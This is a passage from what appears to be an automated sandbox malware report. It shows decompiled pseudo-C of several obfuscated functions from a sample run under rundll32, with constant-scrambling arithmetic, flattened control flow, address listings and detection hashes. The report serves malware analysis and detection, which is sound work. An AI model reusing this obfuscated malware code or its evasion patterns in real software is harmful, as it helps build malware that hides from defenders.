                                                                                                                                  				_v540 = _v540 ^ 0x000d133d;
                                                                                                                                  				_v572 = 0xef4b2;
                                                                                                                                  				_v572 = _v572 << 0xd;
                                                                                                                                  				_v572 = _v572 + 0xffff85b1;
                                                                                                                                  				_v572 = _v572 ^ 0xde949f86;
                                                                                                                                  				_v608 = 0x8e969a;
                                                                                                                                  				_v608 = _v608 << 0xd;
                                                                                                                                  				_t272 = 0x21;
                                                                                                                                  				_v608 = _v608 / _t272;
                                                                                                                                  				_t273 = 0x2f;
                                                                                                                                  				_v608 = _v608 / _t273;
                                                                                                                                  				_v608 = _v608 ^ 0x002a10b8;
                                                                                                                                  				_v620 = 0x864bbd;
                                                                                                                                  				_v620 = _v620 << 0x10;
                                                                                                                                  				_v620 = _v620 + 0x87ba;
                                                                                                                                  				_v620 = _v620 + 0x936f;
                                                                                                                                  				_v620 = _v620 ^ 0x4bb78bcc;
                                                                                                                                  				_v564 = 0xfb8a17;
                                                                                                                                  				_t274 = 0x62;
                                                                                                                                  				_v564 = _v564 * 0x63;
                                                                                                                                  				_v564 = _v564 ^ 0x61429d97;
                                                                                                                                  				_v576 = 0x222f;
                                                                                                                                  				_v576 = _v576 >> 4;
                                                                                                                                  				_v576 = _v576 ^ 0xf39884cf;
                                                                                                                                  				_v576 = _v576 ^ 0xf39d4647;
                                                                                                                                  				_v556 = 0x6068cb;
                                                                                                                                  				_v556 = _v556 ^ 0xfe1a734d;
                                                                                                                                  				_v556 = _v556 ^ 0xfe79d9b4;
                                                                                                                                  				_v616 = 0xc46e23;
                                                                                                                                  				_v616 = _v616 >> 2;
                                                                                                                                  				_v616 = _v616 / _t274;
                                                                                                                                  				_v616 = _v616 * 0x76;
                                                                                                                                  				_v616 = _v616 ^ 0x003e2a5a;
                                                                                                                                  				_v624 = 0x4617e4;
                                                                                                                                  				_v624 = _v624 + 0xffff4d74;
                                                                                                                                  				_v624 = _v624 ^ 0x9dcdfd87;
                                                                                                                                  				_v624 = _v624 + 0x3fd8;
                                                                                                                                  				_v624 = _v624 ^ 0x9d89a5c2;
                                                                                                                                  				_v588 = 0x3a0167;
                                                                                                                                  				_v588 = _v588 << 1;
                                                                                                                                  				_v588 = _v588 + 0xffff1a51;
                                                                                                                                  				_v588 = _v588 ^ 0x00728a40;
                                                                                                                                  				_v532 = 0x3a363e;
                                                                                                                                  				_v532 = _v532 ^ 0xe52a74a2;
                                                                                                                                  				_v532 = _v532 ^ 0xe514694b;
                                                                                                                                  				_v544 = 0x52d5cb;
                                                                                                                                  				_v544 = _v544 | 0x185d0a08;
                                                                                                                                  				_v544 = _v544 ^ 0x18524fe5;
                                                                                                                                  				_v584 = 0x37b3aa;
                                                                                                                                  				_v584 = _v584 + 0xebef;
                                                                                                                                  				_t275 = 0x72;
                                                                                                                                  				_v584 = _v584 * 0x28;
                                                                                                                                  				_v584 = _v584 ^ 0x08d0b087;
                                                                                                                                  				_v592 = 0xa4bebe;
                                                                                                                                  				_v592 = _v592 >> 8;
                                                                                                                                  				_v592 = _v592 | 0x739fbd45;
                                                                                                                                  				_v592 = _v592 ^ 0x739593e3;
                                                                                                                                  				_v552 = 0x17b1c;
                                                                                                                                  				_v552 = _v552 << 0xe;
                                                                                                                                  				_v552 = _v552 ^ 0x5ecd7403;
                                                                                                                                  				_v568 = 0x403d75;
                                                                                                                                  				_v568 = _v568 >> 3;
                                                                                                                                  				_v568 = _v568 | 0x80b15bc0;
                                                                                                                                  				_v568 = _v568 ^ 0x80b9a416;
                                                                                                                                  				_v536 = 0x2ed64e;
                                                                                                                                  				_t276 = _v524;
                                                                                                                                  				_v536 = _v536 / _t275;
                                                                                                                                  				_v536 = _v536 ^ 0x00033d67;
                                                                                                                                  				_v604 = 0x8b403d;
                                                                                                                                  				_v604 = _v604 + 0xffff3866;
                                                                                                                                  				_v604 = _v604 << 8;
                                                                                                                                  				_v604 = _v604 ^ 0x8a7a6cd3;
                                                                                                                                  				goto L1;
                                                                                                                                  				do {
                                                                                                                                  					while(1) {
                                                                                                                                  						L1:
                                                                                                                                  						_t283 = _t247 - 0x73dad95;
                                                                                                                                  						if(_t283 > 0) {
                                                                                                                                  							break;
                                                                                                                                  						}
                                                                                                                                  						if(_t283 == 0) {
                                                                                                                                  							E002EDA22(_v544, _v584, __eflags, _v592,  &_v520, _t247, _v552);
                                                                                                                                  							_t235 = E002D2051(_v536,  &_v520, _v604);
                                                                                                                                  							_t254 =  *0x2f3e10; // 0x0
                                                                                                                                  							 *((intOrPtr*)(_t254 + 0x10)) = _t235;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t247 == 0x7e01d7) {
                                                                                                                                  								_push(_t247);
                                                                                                                                  								_push(_t247);
                                                                                                                                  								 *0x2f3e10 = E002D7FF2(0x45c);
                                                                                                                                  								_t247 = 0x8643fcd;
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t247 == 0xd34913) {
                                                                                                                                  									_t247 = 0x148c4fa;
                                                                                                                                  									_v524 = _v596;
                                                                                                                                  									continue;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t247 == 0xfeb697) {
                                                                                                                                  										_v524 = _v612;
                                                                                                                                  										goto L8;
                                                                                                                                  									} else {
                                                                                                                                  										if(_t247 != 0x148c4fa) {
                                                                                                                                  											goto L20;
                                                                                                                                  										} else {
                                                                                                                                  											E002E8F9E(_v620, _v564, _v576, _v556, _t276);
                                                                                                                                  											_t279 =  &(_t279[3]);
                                                                                                                                  											L8:
                                                                                                                                  											_t247 = 0xac90332;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L23:
                                                                                                                                  						return _t277;
                                                                                                                                  					}
                                                                                                                                  					__eflags = _t247 - 0x8643fcd;
                                                                                                                                  					if(_t247 == 0x8643fcd) {
                                                                                                                                  						_t227 = E002D912C(_v600, _v560, _t247, _v540, _t247, _v572, _v608);
                                                                                                                                  						_t276 = _t227;
                                                                                                                                  						_t279 =  &(_t279[5]);
                                                                                                                                  						__eflags = _t227;
                                                                                                                                  						if(__eflags == 0) {
                                                                                                                                  							_t247 = 0xfeb697;
                                                                                                                                  							goto L20;
                                                                                                                                  						} else {
                                                                                                                                  							_t245 =  *0x2f3e10; // 0x0
                                                                                                                                  							 *((intOrPtr*)(_t245 + 0x450)) = 1;
                                                                                                                                  							_t247 = 0xd34913;
                                                                                                                                  							goto L1;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						__eflags = _t247 - 0xac90332;
                                                                                                                                  						if(_t247 == 0xac90332) {
                                                                                                                                  							_push(_v532);
                                                                                                                                  							_push(_v524);
                                                                                                                                  							_push(_v588);
                                                                                                                                  							_t228 =  *0x2f3e10; // 0x0
                                                                                                                                  							_push(_t228 + 0x23c);
                                                                                                                                  							_t230 = E002E46BB(_v616, _v624);
                                                                                                                                  							_t279 = _t279 - 0xc + 0x1c;
                                                                                                                                  							_t247 = 0xe2d9513;
                                                                                                                                  							__eflags = _t230;
                                                                                                                                  							_t231 = 1;
                                                                                                                                  							_t277 =  ==  ? _t231 : _t277;
                                                                                                                                  							goto L1;
                                                                                                                                  						} else {
                                                                                                                                  							__eflags = _t247 - 0xe2d9513;
                                                                                                                                  							if(_t247 != 0xe2d9513) {
                                                                                                                                  								goto L20;
                                                                                                                                  							} else {
                                                                                                                                  								E002DA55F();
                                                                                                                                  								_t247 = 0x73dad95;
                                                                                                                                  								goto L1;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					goto L23;
                                                                                                                                  					L20:
                                                                                                                                  					__eflags = _t247 - 0x13a2d4a;
                                                                                                                                  				} while (__eflags != 0);
                                                                                                                                  				goto L23;
                                                                                                                                  			}













































                                                                                                                                  0x002e22e5
                                                                                                                                  0x002e22ed
                                                                                                                                  0x002e22f5
                                                                                                                                  0x002e22fd
                                                                                                                                  0x002e2305
                                                                                                                                  0x002e230d
                                                                                                                                  0x002e2315
                                                                                                                                  0x002e231d
                                                                                                                                  0x002e232c
                                                                                                                                  0x002e232d
                                                                                                                                  0x002e2331
                                                                                                                                  0x002e2339
                                                                                                                                  0x002e2341
                                                                                                                                  0x002e2346
                                                                                                                                  0x002e234e
                                                                                                                                  0x002e2356
                                                                                                                                  0x002e235e
                                                                                                                                  0x002e2363
                                                                                                                                  0x002e236b
                                                                                                                                  0x002e2373
                                                                                                                                  0x002e2378
                                                                                                                                  0x002e2380
                                                                                                                                  0x002e2388
                                                                                                                                  0x002e2396
                                                                                                                                  0x002e239a
                                                                                                                                  0x002e239e
                                                                                                                                  0x002e23a6
                                                                                                                                  0x002e23ae
                                                                                                                                  0x002e23b6
                                                                                                                                  0x002e23bb
                                                                                                                                  0x002e23bb
                                                                                                                                  0x002e23c3
                                                                                                                                  0x002e23c3
                                                                                                                                  0x002e23c3
                                                                                                                                  0x002e23c3
                                                                                                                                  0x002e23c5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23cb
                                                                                                                                  0x002e2519
                                                                                                                                  0x002e2532
                                                                                                                                  0x002e2537
                                                                                                                                  0x002e2540
                                                                                                                                  0x002e23d1
                                                                                                                                  0x002e23d7
                                                                                                                                  0x002e243c
                                                                                                                                  0x002e243d
                                                                                                                                  0x002e2445
                                                                                                                                  0x002e244a
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23d9
                                                                                                                                  0x002e23df
                                                                                                                                  0x002e2420
                                                                                                                                  0x002e2425
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23e1
                                                                                                                                  0x002e23e7
                                                                                                                                  0x002e2416
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23e9
                                                                                                                                  0x002e23ef
                                                                                                                                  0x00000000
                                                                                                                                  0x002e23f5
                                                                                                                                  0x002e2406
                                                                                                                                  0x002e240b
                                                                                                                                  0x002e240e
                                                                                                                                  0x002e240e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e240e
                                                                                                                                  0x002e23ef
                                                                                                                                  0x002e23e7
                                                                                                                                  0x002e23df
                                                                                                                                  0x002e23d7
                                                                                                                                  0x002e2544
                                                                                                                                  0x002e254f
                                                                                                                                  0x002e254f
                                                                                                                                  0x002e2454
                                                                                                                                  0x002e245a
                                                                                                                                  0x002e24ca
                                                                                                                                  0x002e24cf
                                                                                                                                  0x002e24d1
                                                                                                                                  0x002e24d4
                                                                                                                                  0x002e24d6
                                                                                                                                  0x002e24f0
                                                                                                                                  0x00000000
                                                                                                                                  0x002e24d8
                                                                                                                                  0x002e24d8
                                                                                                                                  0x002e24e0
                                                                                                                                  0x002e24e6
                                                                                                                                  0x00000000
                                                                                                                                  0x002e24e6
                                                                                                                                  0x002e245c
                                                                                                                                  0x002e245c
                                                                                                                                  0x002e245e
                                                                                                                                  0x002e2478
                                                                                                                                  0x002e247c
                                                                                                                                  0x002e2480
                                                                                                                                  0x002e2484
                                                                                                                                  0x002e2499
                                                                                                                                  0x002e249a
                                                                                                                                  0x002e249f
                                                                                                                                  0x002e24a2
                                                                                                                                  0x002e24a7
                                                                                                                                  0x002e24ab
                                                                                                                                  0x002e24ac
                                                                                                                                  0x00000000
                                                                                                                                  0x002e2460
                                                                                                                                  0x002e2460
                                                                                                                                  0x002e2466
                                                                                                                                  0x00000000
                                                                                                                                  0x002e246c
                                                                                                                                  0x002e246c
                                                                                                                                  0x002e2471
                                                                                                                                  0x00000000
                                                                                                                                  0x002e2471
                                                                                                                                  0x002e2466
                                                                                                                                  0x002e245e
                                                                                                                                  0x00000000
                                                                                                                                  0x002e24f5
                                                                                                                                  0x002e24f5
                                                                                                                                  0x002e24f5
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: /"$>6:$Z*>$u=@
                                                                                                                                  • API String ID: 0-89199335
                                                                                                                                  • Opcode ID: a3dbeb2bf2b856028129616b4dc6feca115964a0e0e0e3bd6881fade5d927f89
                                                                                                                                  • Instruction ID: c1250a51a8190f73bb60a24147a31a4b51ce120f0f73f76ebf40cfc915a1bb2f
                                                                                                                                  • Opcode Fuzzy Hash: a3dbeb2bf2b856028129616b4dc6feca115964a0e0e0e3bd6881fade5d927f89
                                                                                                                                  • Instruction Fuzzy Hash: ACB12171118381DFC358CF26C48A81BFBE5FBC4748F60991DF6A286261D3B58959CF52
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 94%
                                                                                                                                  			E002D5548(void* __edx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                  				char _v16;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				char _v28;
                                                                                                                                  				char _v40;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				intOrPtr _v52;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				char _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				char _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				unsigned int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				void* __ecx;
                                                                                                                                  				void* _t190;
                                                                                                                                  				void* _t206;
                                                                                                                                  				void* _t208;
                                                                                                                                  				signed int _t209;
                                                                                                                                  				char* _t211;
                                                                                                                                  				signed int _t212;
                                                                                                                                  				intOrPtr _t222;
                                                                                                                                  				intOrPtr* _t225;
                                                                                                                                  				void* _t227;
                                                                                                                                  				char* _t229;
                                                                                                                                  				char _t233;
                                                                                                                                  				intOrPtr _t255;
                                                                                                                                  				intOrPtr* _t257;
                                                                                                                                  				signed int _t258;
                                                                                                                                  				signed int _t259;
                                                                                                                                  				signed int _t260;
                                                                                                                                  				signed int* _t263;
                                                                                                                                  
                                                                                                                                  				_t225 = _a16;
                                                                                                                                  				_t257 = _a4;
                                                                                                                                  				_push(_t225);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_t257);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				E002E20B9(_t190);
                                                                                                                                  				_v56 = 0xb9e7cb;
                                                                                                                                  				_t255 = 0;
                                                                                                                                  				_v52 = 0x6e87b5;
                                                                                                                                  				_t263 =  &(( &_v148)[6]);
                                                                                                                                  				_v48 = 0;
                                                                                                                                  				_v44 = 0;
                                                                                                                                  				_t227 = 0x3ccc1e9;
                                                                                                                                  				_v128 = 0x85629b;
                                                                                                                                  				_t258 = 0x62;
                                                                                                                                  				_v128 = _v128 * 0x5a;
                                                                                                                                  				_v128 = _v128 + 0xfbaf;
                                                                                                                                  				_v128 = _v128 ^ 0x2ee5a62d;
                                                                                                                                  				_v144 = 0xfc0c7f;
                                                                                                                                  				_v144 = _v144 ^ 0xfdfaf442;
                                                                                                                                  				_v144 = _v144 >> 1;
                                                                                                                                  				_v144 = _v144 | 0x14143ad1;
                                                                                                                                  				_v144 = _v144 ^ 0x7e977ecf;
                                                                                                                                  				_v96 = 0xd1f565;
                                                                                                                                  				_v96 = _v96 * 0x21;
                                                                                                                                  				_v96 = _v96 ^ 0x1b12de47;
                                                                                                                                  				_v104 = 0xb219e8;
                                                                                                                                  				_v104 = _v104 | 0x75a31cc8;
                                                                                                                                  				_v104 = _v104 ^ 0x75be6df4;
                                                                                                                                  				_v80 = 0x6fb9b6;
                                                                                                                                  				_v80 = _v80 * 0x3e;
                                                                                                                                  				_v80 = _v80 ^ 0x1b001c4a;
                                                                                                                                  				_v132 = 0x1154a0;
                                                                                                                                  				_v132 = _v132 << 0xb;
                                                                                                                                  				_v132 = _v132 + 0xfffffde8;
                                                                                                                                  				_v132 = _v132 | 0xd1d436bb;
                                                                                                                                  				_v132 = _v132 ^ 0xdbfeae5a;
                                                                                                                                  				_v76 = 0x5374cd;
                                                                                                                                  				_v76 = _v76 << 2;
                                                                                                                                  				_v76 = _v76 ^ 0x0147cb67;
                                                                                                                                  				_v140 = 0x35e68a;
                                                                                                                                  				_v140 = _v140 + 0xffff467d;
                                                                                                                                  				_v140 = _v140 * 0x7c;
                                                                                                                                  				_v140 = _v140 ^ 0x566bba39;
                                                                                                                                  				_v140 = _v140 ^ 0x4faa8078;
                                                                                                                                  				_v124 = 0xf91357;
                                                                                                                                  				_v124 = _v124 << 0xf;
                                                                                                                                  				_v124 = _v124 + 0xf2e4;
                                                                                                                                  				_v124 = _v124 ^ 0x89afe8a4;
                                                                                                                                  				_v112 = 0xf055e4;
                                                                                                                                  				_v112 = _v112 ^ 0x101963ca;
                                                                                                                                  				_v112 = _v112 | 0x7be8ad21;
                                                                                                                                  				_v112 = _v112 ^ 0x7be17431;
                                                                                                                                  				_v84 = 0x17393b;
                                                                                                                                  				_v84 = _v84 << 6;
                                                                                                                                  				_v84 = _v84 ^ 0x05c81c43;
                                                                                                                                  				_v120 = 0xf688ab;
                                                                                                                                  				_v120 = _v120 / _t258;
                                                                                                                                  				_v120 = _v120 * 0x2d;
                                                                                                                                  				_v120 = _v120 ^ 0x00718a36;
                                                                                                                                  				_v116 = 0xa21f51;
                                                                                                                                  				_v116 = _v116 + 0x3c3b;
                                                                                                                                  				_v116 = _v116 >> 0xa;
                                                                                                                                  				_v116 = _v116 ^ 0x0006c391;
                                                                                                                                  				_v88 = 0x51e239;
                                                                                                                                  				_v88 = _v88 + 0x2ec0;
                                                                                                                                  				_v88 = _v88 ^ 0x0058dd2b;
                                                                                                                                  				_v136 = 0xa92d92;
                                                                                                                                  				_v136 = _v136 >> 0xd;
                                                                                                                                  				_v136 = _v136 ^ 0x0647b396;
                                                                                                                                  				_v136 = _v136 ^ 0x20b7ff2f;
                                                                                                                                  				_v136 = _v136 ^ 0x26fd7475;
                                                                                                                                  				_v108 = 0xb50576;
                                                                                                                                  				_t259 = 0x45;
                                                                                                                                  				_v108 = _v108 / _t259;
                                                                                                                                  				_v108 = _v108 ^ 0xb94dc178;
                                                                                                                                  				_v108 = _v108 ^ 0xb943792d;
                                                                                                                                  				_v148 = 0xb9b260;
                                                                                                                                  				_t260 = 0x14;
                                                                                                                                  				_v148 = _v148 / _t260;
                                                                                                                                  				_v148 = _v148 * 0x3f;
                                                                                                                                  				_v148 = _v148 >> 2;
                                                                                                                                  				_v148 = _v148 ^ 0x009e914b;
                                                                                                                                  				_v92 = 0x6e7d65;
                                                                                                                                  				_v92 = _v92 | 0xb573042f;
                                                                                                                                  				_v92 = _v92 ^ 0xb570b7bc;
                                                                                                                                  				_v100 = 0xfd8f7e;
                                                                                                                                  				_v100 = _v100 * 0x5d;
                                                                                                                                  				_v100 = _v100 ^ 0x5c1db3f3;
                                                                                                                                  				L1:
                                                                                                                                  				while(_t227 != 0x3c16ad4) {
                                                                                                                                  					if(_t227 == 0x3ccc1e9) {
                                                                                                                                  						_t227 = 0x7dbf5b4;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t227 == 0x79abc1a) {
                                                                                                                                  						_t229 =  &_v28;
                                                                                                                                  						_t208 = E002DAEFB(_t229, _v124, _v112, _v84,  &_v16, _v120);
                                                                                                                                  						_t263 =  &(_t263[4]);
                                                                                                                                  						if(_t208 != 0) {
                                                                                                                                  							_push(_t229);
                                                                                                                                  							_push(_t229);
                                                                                                                                  							_t222 = E002D7FF2(_v24);
                                                                                                                                  							 *_t257 = _t222;
                                                                                                                                  							if(_t222 != 0) {
                                                                                                                                  								E002DED7E(_v108,  *_t257, _v148, _v28, _v24);
                                                                                                                                  								_t263 =  &(_t263[3]);
                                                                                                                                  								 *((intOrPtr*)(_t257 + 4)) = _v24;
                                                                                                                                  								_t255 = 1;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t227 = 0xdaef9d5;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					if(_t227 == 0x7dbf5b4) {
                                                                                                                                  						_t209 =  *((intOrPtr*)(_t225 + 4));
                                                                                                                                  						_t233 =  *_t225;
                                                                                                                                  						_v68 = _t209;
                                                                                                                                  						_v72 = _t233;
                                                                                                                                  						_t211 = _t209 - 1 + _t233;
                                                                                                                                  						while(_t211 > _t233) {
                                                                                                                                  							if( *_t211 == 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							_t211 = _t211 - 1;
                                                                                                                                  						}
                                                                                                                                  						_t212 = _t211 - _t233;
                                                                                                                                  						_v68 = _t212;
                                                                                                                                  						if(_t212 == 0) {
                                                                                                                                  							L16:
                                                                                                                                  							_t227 = 0xfc35b14;
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						while(_v68 % _v144 != _v128) {
                                                                                                                                  							_t163 =  &_v68;
                                                                                                                                  							 *_t163 = _v68 - 1;
                                                                                                                                  							if( *_t163 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  							goto L16;
                                                                                                                                  						}
                                                                                                                                  						goto L16;
                                                                                                                                  					}
                                                                                                                                  					if(_t227 == 0xdaef9d5) {
                                                                                                                                  						E002E8519(_v92, _v100, _v64);
                                                                                                                                  						L28:
                                                                                                                                  						return _t255;
                                                                                                                                  					}
                                                                                                                                  					if(_t227 != 0xfc35b14) {
                                                                                                                                  						L25:
                                                                                                                                  						if(_t227 != 0xb843ed5) {
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						goto L28;
                                                                                                                                  					}
                                                                                                                                  					if(E002D5E60( &_v72, _v96, _v104,  &_v64) == 0) {
                                                                                                                                  						goto L28;
                                                                                                                                  					}
                                                                                                                                  					_t227 = 0x3c16ad4;
                                                                                                                                  				}
                                                                                                                                  				_t206 = E002D8B3D( &_v40, _v80, _v132,  &_v64, _v76, _v140);
                                                                                                                                  				_t263 =  &(_t263[4]);
                                                                                                                                  				if(_t206 == 0) {
                                                                                                                                  					_t227 = 0xdaef9d5;
                                                                                                                                  					goto L25;
                                                                                                                                  				}
                                                                                                                                  				_t227 = 0x79abc1a;
                                                                                                                                  				goto L1;
                                                                                                                                  			}



















































                                                                                                                                  0x002d573a
                                                                                                                                  0x002d5742
                                                                                                                                  0x002d574a
                                                                                                                                  0x002d574f
                                                                                                                                  0x002d5757
                                                                                                                                  0x002d575f
                                                                                                                                  0x002d5767
                                                                                                                                  0x002d5775
                                                                                                                                  0x002d577a
                                                                                                                                  0x002d5780
                                                                                                                                  0x002d5788
                                                                                                                                  0x002d5790
                                                                                                                                  0x002d579c
                                                                                                                                  0x002d57a4
                                                                                                                                  0x002d57ad
                                                                                                                                  0x002d57b1
                                                                                                                                  0x002d57b6
                                                                                                                                  0x002d57be
                                                                                                                                  0x002d57c6
                                                                                                                                  0x002d57ce
                                                                                                                                  0x002d57d6
                                                                                                                                  0x002d57e3
                                                                                                                                  0x002d57e7
                                                                                                                                  0x00000000
                                                                                                                                  0x002d57ef
                                                                                                                                  0x002d5801
                                                                                                                                  0x002d591d
                                                                                                                                  0x00000000
                                                                                                                                  0x002d591d
                                                                                                                                  0x002d580d
                                                                                                                                  0x002d58ac
                                                                                                                                  0x002d58bb
                                                                                                                                  0x002d58c0
                                                                                                                                  0x002d58c5
                                                                                                                                  0x002d58da
                                                                                                                                  0x002d58db
                                                                                                                                  0x002d58dc
                                                                                                                                  0x002d58e1
                                                                                                                                  0x002d58e7
                                                                                                                                  0x002d5901
                                                                                                                                  0x002d590f
                                                                                                                                  0x002d5912
                                                                                                                                  0x002d5915
                                                                                                                                  0x002d5915
                                                                                                                                  0x002d58e7
                                                                                                                                  0x002d5916
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5916
                                                                                                                                  0x002d5819
                                                                                                                                  0x002d5856
                                                                                                                                  0x002d5859
                                                                                                                                  0x002d585b
                                                                                                                                  0x002d5860
                                                                                                                                  0x002d5864
                                                                                                                                  0x002d586e
                                                                                                                                  0x002d586b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d586d
                                                                                                                                  0x002d586d
                                                                                                                                  0x002d5872
                                                                                                                                  0x002d5874
                                                                                                                                  0x002d5878
                                                                                                                                  0x002d5892
                                                                                                                                  0x002d5892
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5892
                                                                                                                                  0x002d587a
                                                                                                                                  0x002d588c
                                                                                                                                  0x002d588c
                                                                                                                                  0x002d5890
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5890
                                                                                                                                  0x00000000
                                                                                                                                  0x002d587a
                                                                                                                                  0x002d581d
                                                                                                                                  0x002d5975
                                                                                                                                  0x002d597b
                                                                                                                                  0x002d5987
                                                                                                                                  0x002d5987
                                                                                                                                  0x002d5829
                                                                                                                                  0x002d595b
                                                                                                                                  0x002d5961
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5967
                                                                                                                                  0x002d5849
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d584f
                                                                                                                                  0x002d584f
                                                                                                                                  0x002d5943
                                                                                                                                  0x002d5948
                                                                                                                                  0x002d594d
                                                                                                                                  0x002d5959
                                                                                                                                  0x00000000
                                                                                                                                  0x002d5959
                                                                                                                                  0x002d594f
                                                                                                                                  0x00000000

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 1t{$9Q$;<$e}n
                                                                                                                                  • API String ID: 0-2095593254
                                                                                                                                  • Opcode ID: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                  • Instruction ID: 5de375f5fada758ac6ff612eac494f365f44aa4890e7d513b42f6d7974230386
                                                                                                                                  • Opcode Fuzzy Hash: 3e729f004d8ed529ecf323f69a5bd049de09d4616ed983f039155076c9e898ed
                                                                                                                                  • Instruction Fuzzy Hash: 37B141B1118382CFC328CF22C58591BFBE1FBD4748F50891EF69696260D7B18A59CF42
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 95%
                                                                                                                                  			E002E7DD5() {
                                                                                                                                  				char _v520;
                                                                                                                                  				char _v1040;
                                                                                                                                  				signed int _v1044;
                                                                                                                                  				signed int _v1048;
                                                                                                                                  				intOrPtr _v1052;
                                                                                                                                  				intOrPtr _v1056;
                                                                                                                                  				unsigned int _v1060;
                                                                                                                                  				signed int _v1064;
                                                                                                                                  				signed int _v1068;
                                                                                                                                  				signed int _v1072;
                                                                                                                                  				signed int _v1076;
                                                                                                                                  				signed int _v1080;
                                                                                                                                  				signed int _v1084;
                                                                                                                                  				signed int _v1088;
                                                                                                                                  				signed int _v1092;
                                                                                                                                  				signed int _v1096;
                                                                                                                                  				signed int _v1100;
                                                                                                                                  				signed int _v1104;
                                                                                                                                  				signed int _v1108;
                                                                                                                                  				signed int _v1112;
                                                                                                                                  				signed int _v1116;
                                                                                                                                  				signed int _v1120;
                                                                                                                                  				signed int _v1124;
                                                                                                                                  				signed int _v1128;
                                                                                                                                  				signed int _v1132;
                                                                                                                                  				signed int _v1136;
                                                                                                                                  				signed int _v1140;
                                                                                                                                  				signed int _v1144;
                                                                                                                                  				signed int _v1148;
                                                                                                                                  				signed int _v1152;
                                                                                                                                  				signed int _v1156;
                                                                                                                                  				intOrPtr _t236;
                                                                                                                                  				void* _t241;
                                                                                                                                  				short* _t244;
                                                                                                                                  				void* _t247;
                                                                                                                                  				void* _t250;
                                                                                                                                  				intOrPtr _t256;
                                                                                                                                  				intOrPtr _t272;
                                                                                                                                  				signed int _t278;
                                                                                                                                  				signed int _t279;
                                                                                                                                  				signed int _t280;
                                                                                                                                  				signed int* _t283;
                                                                                                                                  
                                                                                                                                  				_t283 =  &_v1156;
                                                                                                                                  				_v1048 = _v1048 & 0x00000000;
                                                                                                                                  				_v1044 = _v1044 & 0x00000000;
                                                                                                                                  				_t250 = 0x1242b9;
                                                                                                                                  				_v1056 = 0xc74a30;
